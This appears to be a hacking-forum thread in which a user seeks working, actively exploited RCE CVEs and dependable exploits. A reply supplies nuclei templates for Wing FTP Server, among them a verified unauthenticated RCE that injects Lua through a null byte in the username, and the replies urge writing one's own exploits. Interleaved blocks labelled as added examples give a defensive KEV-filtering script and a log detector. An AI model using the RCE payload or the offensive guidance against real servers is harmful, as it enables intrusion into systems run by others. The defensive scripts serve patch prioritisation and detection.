
Remote Question about exploit and cve searching

eyna
CD-disk · User
Joined: 07.01.2025 · Messages: 12 · Reactions: 1
Hello guys, hope you have a great time.

I wanted to know where I can find RCE and command injection CVEs like CVE-2025-47812 (Wing FTP) that are actually working and being exploited. I want to know the most-exploited vulnerabilities across the world, with the year specified, like the top 20 RCE CVEs exploited in 2025 or 2024 and so on.

Also wanted to know, after finding CVE IDs, where the best resources are for getting their exploits (working and valid ones, not the trash on the internet that mostly doesn't work).

Thank you
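Added example (mine, not from the thread): one defender-side way to answer the "most exploited RCE CVEs per year" question is to filter the CISA Known Exploited Vulnerabilities catalogue by year and by command/code-execution class, which is also the list a patching team should work from. The record field names follow the public KEV JSON feed as I know it; the embedded records are constructed samples (the CVE-2025-47812 entry reuses the thread's description, the CVE-*-9999x ids are placeholders, the dates are made up), and RCE_CWES plus the keyword pattern are my heuristic, not a catalogue field.

```python
"""Filter a KEV-style catalogue for actively exploited RCE / command-injection CVEs
by year, for patch prioritisation.  Added example, not from the thread.
ASSUMPTIONS: record field names follow the public CISA KEV JSON feed as the
author of this example knows it; the embedded records are CONSTRUCTED samples
(CVE-2025-47812 uses the thread's description; CVE-*-9999x ids are placeholders)."""
import json
import re
import urllib.request
from collections import Counter

KEV_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"

# MITRE CWE ids for command / code injection classes.
RCE_CWES = {"CWE-77", "CWE-78", "CWE-94", "CWE-95", "CWE-917"}
# Wording used in catalogue names/descriptions for RCE-class flaws (heuristic).
RCE_PATTERN = re.compile(
    r"remote code execution|(command|code) injection|"
    r"execut(e|ion of) arbitrary (code|commands?)",
    re.IGNORECASE,
)

SAMPLE_KEV_JSON = json.dumps({"title": "CONSTRUCTED sample in KEV feed shape", "vulnerabilities": [
    {"cveID": "CVE-2025-47812", "vendorProject": "Wing FTP Server", "product": "Wing FTP Server",
     "vulnerabilityName": "Wing FTP Server Improper Null Byte Handling",
     "dateAdded": "2025-07-01",  # constructed date, not the real catalogue date
     "shortDescription": "Null byte handling flaw in the username parameter allows "
                         "unauthenticated remote code execution.",
     "knownRansomwareCampaignUse": "Unknown", "cwes": ["CWE-158"]},
    {"cveID": "CVE-2025-99991", "vendorProject": "ExampleVendor", "product": "ExampleGateway",
     "vulnerabilityName": "ExampleGateway OS Command Injection", "dateAdded": "2025-03-15",
     "shortDescription": "OS command injection in the admin API.",
     "knownRansomwareCampaignUse": "Known", "cwes": ["CWE-78"]},
    {"cveID": "CVE-2025-99992", "vendorProject": "ExampleVendor", "product": "ExampleVPN",
     "vulnerabilityName": "ExampleVPN Authentication Bypass", "dateAdded": "2025-02-20",
     "shortDescription": "Authentication bypass allows reading configuration files.",
     "knownRansomwareCampaignUse": "Unknown", "cwes": ["CWE-287"]},
    {"cveID": "CVE-2024-99993", "vendorProject": "ExampleVendor", "product": "ExampleCMS",
     "vulnerabilityName": "ExampleCMS Code Injection", "dateAdded": "2024-11-02",
     "shortDescription": "Template code injection allows execution of arbitrary code.",
     "knownRansomwareCampaignUse": "Unknown", "cwes": ["CWE-94"]},
]})


def fetch_kev(url=KEV_URL):
    """Download the live catalogue (needs network; the offline demo does not call it)."""
    with urllib.request.urlopen(url, timeout=30) as resp:
        return resp.read().decode("utf-8")


def load_catalog(text):
    """Parse a KEV-format JSON document and return its vulnerability records."""
    return json.loads(text)["vulnerabilities"]


def is_rce(record):
    """True when the CWE ids or the wording indicate command/code execution."""
    if RCE_CWES & set(record.get("cwes", [])):
        return True
    text = record.get("vulnerabilityName", "") + " " + record.get("shortDescription", "")
    return RCE_PATTERN.search(text) is not None


def exploited_rce_by_year(records, year):
    """RCE-class records added in `year`; ransomware-linked ones first, then oldest first."""
    hits = [r for r in records if r["dateAdded"].startswith(f"{year}-") and is_rce(r)]
    hits.sort(key=lambda r: (r.get("knownRansomwareCampaignUse") != "Known", r["dateAdded"]))
    return hits


def top_n(records, year, n=20):
    """(cveID, product, dateAdded, ransomware use) for the top-n entries of the year."""
    return [(r["cveID"], r["product"], r["dateAdded"], r.get("knownRansomwareCampaignUse"))
            for r in exploited_rce_by_year(records, year)[:n]]


def products_by_count(records, year):
    """Number of exploited RCE CVEs per product in the year, most-hit product first."""
    return Counter(r["product"] for r in exploited_rce_by_year(records, year)).most_common()


if __name__ == "__main__":
    catalog = load_catalog(SAMPLE_KEV_JSON)  # use load_catalog(fetch_kev()) for live data
    for row in top_n(catalog, 2025):
        print(*row, sep="\t")
```

Swap `SAMPLE_KEV_JSON` for `fetch_kev()` to run against the live catalogue; the year filter uses `dateAdded` (when CISA recorded exploitation), which is what "exploited in 2025" actually means operationally, rather than the year in the CVE id.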
 
You can look at nuclei -> https://docs.projectdiscovery.io/opensource/nuclei/overview
Here you can find all the templates for nuclei. -> https://xssforum.onion/threads/96312/post-1028061

PoC from the list of templates (from the community, I'm not using this, just searched for you):

CVE-2025-47813 => Path Disclosure via Overlong UID Cookie
Code:
id: CVE-2025-47813

info:
  name: Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
  author: rcesecurity,pdteam
  severity: medium
  description: |
    Wing FTP Server versions prior to 7.4.4 are vulnerable to an authenticated information disclosure vulnerability (CVE-2025-47813).
    The vulnerability occurs due to improper validation of the 'UID' session cookie in the /loginok.html endpoint. Supplying an
    overlong UID value causes the server to respond with an error that includes the full local filesystem path. This can aid in further
    exploitation (e.g., CVE-2025-47812) by revealing the application’s file system layout.
  reference:
    - https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
    - https://www.wftpserver.com
  classification:
    epss-score: 0.0088
    epss-percentile: 0.74606
    cve-id: CVE-2025-47813
    cwe-id: CWE-209
    cvss-score: 5.3
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:NH
  metadata:
    product: wftpserver
    vendor: wing_ftp_server
    verified: false
    shodan-query:
      - http.html_hash:2121146066
      - http.favicon.hash:963565804
      - title:"Wing FTP Server"
      - "Server: Wing FTP Server"
    fofa-query:
      - icon_hash="963565804"
      - title="Wing FTP Server"
    zoomeye-query:
      - app="Wing FTP Server"
  tags: cve,cve2025,wingftp,unauth,exposure,vuln

variables:
  longuid: "{{repeat('A', 2048)}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/loginok.html"

    headers:
      Cookie: "UID={{longuid}}"
      Content-Type: application/x-www-form-urlencoded

    body: "username=anonymous&password=test"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Server Path"
          - "Error"
          - ":\\\\"  # Windows path
          - "/usr/"  # Linux path
        condition: or

      - type: word
        part: header
        words:
          - "Wing FTP Server"

    extractors:
      - type: regex
        part: body
        regex:
          - '([a-zA-Z]:[\\/][^A\r\n]{10,})'

OR

CVE-2025-47812 => Remote Code Execution

Code:
id: CVE-2025-47812

info:
  name: Wing FTP Server <= 7.4.3 - Remote Code Execution
  author: rcesecurity,4m3rr0r
  severity: critical
  description: |
    Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) flaw (CVE-2025-47812).
    The vulnerability arises from improper NULL byte handling in the 'username' parameter during login, which allows Lua code injection
    into session files. These injected session files are executed when accessing authenticated endpoints such as /dir.html, resulting
    in arbitrary command execution with elevated privileges. This attack is possible only when anonymous login is enabled on the server.
  reference:
    - https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
    - https://github.com/4m3rr0r/CVE-2025-47812-poc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-47812
    epss-score: 0.9249
    epss-percentile: 0.9972
  metadata:
    verified: true
    product: wftpserver
    vendor: wing_ftp_server
    shodan-query:
      - http.html_hash:2121146066
      - http.favicon.hash:963565804
      - title:"Wing FTP Server"
      - "Server: Wing FTP Server"
    fofa-query:
      - icon_hash="963565804"
      - title="Wing FTP Server"
      - "Server: Wing FTP Server"
    zoomeye-query:
      - app="Wing FTP Server"
  tags: cve,cve2025,rce,wingftp,ftp,unauth,kev,vkev,vuln

variables:
  cmd: "echo CVE-2025-47812"

http:
  - raw:
      - |
        POST /loginok.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=anonymous%00]]%0dlocal+h+%3d+io.popen("{{cmd}}")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=

  - raw:
      - |
        GET /dir.html HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(to_lower(body), "cve-2025-47812")'
        condition: and

I believe you can do it.
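Added example, written by me as the defender's counterpart to the two templates above; it is not part of the post or of the nuclei project. It scans request logs for the indicators the template descriptions name (a NUL byte in the username sent to /loginok.html for CVE-2025-47812, an overlong UID cookie for CVE-2025-47813) and records whether the same source then requested /dir.html, the second step of the RCE template. The JSON-lines log format, the MAX_UID_LEN threshold and the log lines themselves are assumptions and constructed data; the null-byte body is cut down to the indicator alone.

```python
"""Detection of the two Wing FTP Server indicators described in the templates above,
run over request logs.  Added example; not from the post or the nuclei project.
ASSUMPTIONS: logs are JSON lines with src, ts, method, path, cookie, body (as a
reverse proxy or WAF in front of the server might record them); MAX_UID_LEN is a
chosen threshold; the lines below are CONSTRUCTED, the null-byte body reduced to
the indicator itself."""
import json
from datetime import datetime, timedelta
from urllib.parse import parse_qs

MAX_UID_LEN = 512  # assumption: anything longer is not a legitimate session id


def _line(src, ts, method, path, cookie="", body=""):
    """Build one constructed JSON-lines record."""
    return json.dumps({"src": src, "ts": ts, "method": method, "path": path,
                       "cookie": cookie, "body": body})


# Constructed log: a null-byte login followed by /dir.html (CVE-2025-47812 pattern),
# an overlong UID cookie (CVE-2025-47813 pattern), and an ordinary login.
SAMPLE_LOG = "\n".join([
    _line("198.51.100.7", "2025-07-10T09:00:01Z", "POST", "/loginok.html",
          body="username=anonymous%00]]&password="),
    _line("198.51.100.7", "2025-07-10T09:00:03Z", "GET", "/dir.html", cookie="UID=abc123"),
    _line("203.0.113.9", "2025-07-10T09:05:00Z", "POST", "/loginok.html",
          cookie="UID=" + "A" * 2048, body="username=anonymous&password=test"),
    _line("192.0.2.44", "2025-07-10T09:10:00Z", "POST", "/loginok.html",
          body="username=alice&password=REDACTED"),
])


def parse_log(text):
    """Parse JSON-lines records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _ts(rec):
    """Timestamp of a record as an aware datetime ('Z' suffix accepted)."""
    return datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))


def login_indicators(rec):
    """Indicator names for one request to /loginok.html (empty list otherwise)."""
    hits = []
    if rec.get("path") != "/loginok.html":
        return hits
    # CVE-2025-47812: NUL byte inside 'username'. parse_qs decodes %00 to '\x00',
    # and a raw NUL carried as \u0000 in the JSON survives decoding unchanged.
    fields = parse_qs(rec.get("body", ""), keep_blank_values=True)
    if any("\x00" in user for user in fields.get("username", [])):
        hits.append("null-byte-in-username")
    # CVE-2025-47813: overlong 'UID' session cookie.
    for part in rec.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "UID" and len(value) > MAX_UID_LEN:
            hits.append("overlong-uid-cookie")
    return hits


def detect(records, window=timedelta(seconds=60)):
    """One alert per suspicious login; flag a later /dir.html request from the same
    source inside `window`, which is the second step of the RCE template."""
    alerts = []
    for i, rec in enumerate(records):
        inds = login_indicators(rec)
        if not inds:
            continue
        t0 = _ts(rec)
        followed = any(
            r["src"] == rec["src"] and r["path"] == "/dir.html"
            and timedelta(0) <= _ts(r) - t0 <= window
            for r in records[i + 1:]
        )
        alerts.append({"src": rec["src"], "ts": rec["ts"], "indicators": inds,
                       "followed_by_dir_html": followed})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_log(SAMPLE_LOG)):
        print(json.dumps(alert))
```

Most access logs do not contain POST bodies, so the username check needs a WAF or full-request capture in front of the server, while the cookie-length check works on header-only logs; the follow-up /dir.html request is what separates a probe from a completed exploitation attempt, and since the description notes the attack only succeeds with anonymous login enabled, confirming that setting is off on the server is the first triage step for any alert.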
 
Good method, sir, thanks.
 
Hello guys, hope you have a great time.

I wanted to know where I can find RCE and command injection CVEs
My favorite CVE search tool is OpenCVE.

Hello guys, hope you have a great time.

I wanted to know where I can find RCE and command injection CVEs like CVE-2025-47812 (Wing FTP) that are actually working and being exploited.
CVE-2025-47812 (Wing FTP) is not working or being exploited; it's overhyped, and it requires anonymous login to be enabled (which isn't enabled by default). I just tested this CVE today; this almost never works in real-world scenarios.

Also wanted to know, after finding CVE IDs, where the best resources are for getting their exploits (working and valid ones, not the trash on the internet that mostly doesn't work).

Thank you
You need to write your own. 90% of exploits online are trash because they don't work, or they only work on very low-value targets.
 

